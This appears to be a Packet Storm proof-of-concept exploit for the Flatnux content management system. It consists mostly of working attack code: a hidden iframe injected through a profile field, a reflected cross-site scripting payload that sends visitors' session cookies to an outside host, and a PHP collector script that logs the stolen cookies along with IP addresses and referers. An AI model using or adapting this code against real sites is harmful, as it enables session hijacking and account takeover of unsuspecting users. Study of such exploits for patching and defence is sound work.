Flatnux 2009-01-27 cross site scripting / iframe injection proof of concept code.
0a271eacfa48bd24aedbaf1c8e34f4347461e219d0e8e15217ccf5fea7f68ba4/*
- Flatnux-2009-01-27 XSS/Iframe injection p0c
+ 1] Create acount
+ 1] Go to http://localhost/~flatnux/?mod=login&op=modprof&user=[username]
- Set iframe in the Job fields
(Jobless l0l<iframe src=http://0xc00000fdh.boo.pl/flatnux_ost.php style="visibility:hidden;width:0px;height:0px"></iframe>)
+ 3] Now m4k3 frieNdship witch Sheep
Greetings : cOndemned , sid.psycho , wszyscy których ników nie umie wymówić :P
and Biggest 4 g0rion l0l
"... droga jest ważniejsza od celu .... :P"
http://www.wrzuta.pl/audio/iL4UkPk6YK/
Alfons Luja
*/
<script type="text/javascript">
path = "http://localhost/~flatnux/index.php?mod=02_Flatforum\"><script>location.href=\"http://0xc00000fdh.boo.pl/collector.php?kuka=\"%2Bdocument.cookie;<%2Fscript>";
location.href = path;
</script>
/*++++++++++++++++++collector.php++++++++++++++++++++++
<?php
if(isset($_GET['kuka'])){
$gethim = $_GET['kuka'];
$data = "KUKI_GRABER:\n";
$data.= date("dmY H:i:s")."\n";
$data.= "REFERER: ".$_SERVER['HTTP_REFERER']."\n";
$data.= "IP: ".$_SERVER['REMOTE_ADDR']."\n";
$data.= "CIACHO: ".$gethim."\n";
$hnd = fopen("KUKI_FLATNUX.TXT","a");
if(!hnd) exit(666);
flock($hnd,LOCK_EX);
fwrite($hnd,$data);
flock($hnd,LOCK_UN);
fclose($hnd);
}
?>
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*/
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed